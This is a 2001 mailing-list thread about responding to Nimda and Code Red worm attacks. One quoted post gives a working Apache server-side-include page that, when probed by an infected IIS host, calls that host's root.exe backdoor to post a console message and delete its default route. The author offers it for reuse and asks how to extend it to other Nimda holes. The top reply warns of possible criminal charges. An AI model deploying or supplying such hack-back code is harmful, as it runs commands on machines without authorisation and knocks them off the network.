Probably not a good idea. Does anyone remember the recent story about a
gentleman that now has criminal charges pending against him because
(trying to be helpful) he notified a company that their frontpage server
extensions allowed anyone to access their server?
This could really backfire on you...
On Mon, 24 Sep 2001, Paul Chvostek wrote:
>
> Hi Asgard.
>
> I don't think you'll have any luck collecting the $1 per attack. My
> approach is simpler, though likely to raise eyebrows. Input from
> lawyers would be especially welcome. ;)
>
> My assumptions are:
> - any host which is attacking my has vulnerabilities which should have
> been patched months ago, and
> - any unpatched server is being run by administrators or companies who
> don't care enough about system uptime to implement proper security.
>
> I've created a default.ida file in my web root, and added lines to
> Apache's httpd.conf to turn .ida files into SSI. My default.ida is:
>
> <p>This host is immune to Code Red. Upgrade to a real operating system.</p>
> <!--#exec cmd="/usr/local/bin/lynx -dump
>http://$REMOTE_HOST/scripts/root.exe\?/c+net+send+localhost+%22Your+webserver+has+been+infected+with+the+CodeRed2+worm.+You+should+fix+it+before+script+kiddie+comes+along+and+take+advantage+of+it+again.+Remove+root.exe+and+shell.exe+from+c:%5Cinetpub%5Cscripts+\(or+wherever+your+CGI+scripts+live\),+and+install+a+bloody+virus+scanner.%22"
> -->
> <!--#exec cmd="/usr/local/bin/lynx -dump
>http://$REMOTE_HOST/scripts/root.exe\?/c+route+delete+0.0.0.0"; -->
>
> If all goes as planned, the effect is to put a message on the console,
> and remove the default route on the host thereby protecting the Internet
> and forcing someone to look at the console.
>
> Note that this *only* catches machines which have been infected with
> CodeRed2, which leaves a leftover /scripts/root.exe to play with.
> If someone wants to tell me how to do this with some of the other
> vulnerabilities that Nimda tries to use, I'd be grateful. :)
>
> p
>
>
> On Sat, Sep 22, 2001 at 10:42:07PM +0200, Asgard Hostmaster wrote:
> >
> > Hi,
> >
> > Thought I'd post this here as this group seems to be one of the most
> > eclectic and knowledgeable around. We're all aware of the current NIMDA
> > worm attacks. I recently modified my IIS 404 error page to do a netblock
> > lookup on the IP of the server trying to attack ours and then email the
> > netblock owner and store the information in a database. Since doing that
> > a little over 24hrs ago we've received 84807 attacks from 101 separate
> > servers.
> >
> > Considering this worm uses exploits that got massive publicity with Code
> > Red, I'm wondering about liability of companies that continue to run
> > vulnerable servers? I'm seriously considering automatically reviewing
> > all ip addresses 24hrs after they've first attacked and and if I'm
> > still being attacked giving them a further 6 or 12 hours and then I'll
> > charge them $1/attack until it stops. For god's sake it's a 15 min job
> > at most to actually stop the virus, though longer to fully check and
> > clear the server. Perhaps this sort of action might convince some people
> > to finally take server patching seriously? Thoughts folks? Any lawyers
> > on the list interested in taking it up? :-)
> >
> > Cheers,
> > david
>
> --
> Paul Chvostek <[EMAIL PROTECTED]>
> Operations / Development / Abuse / Whatever vox: +1 416 598-0000
> IT Canada http://www.it.ca/
>
>
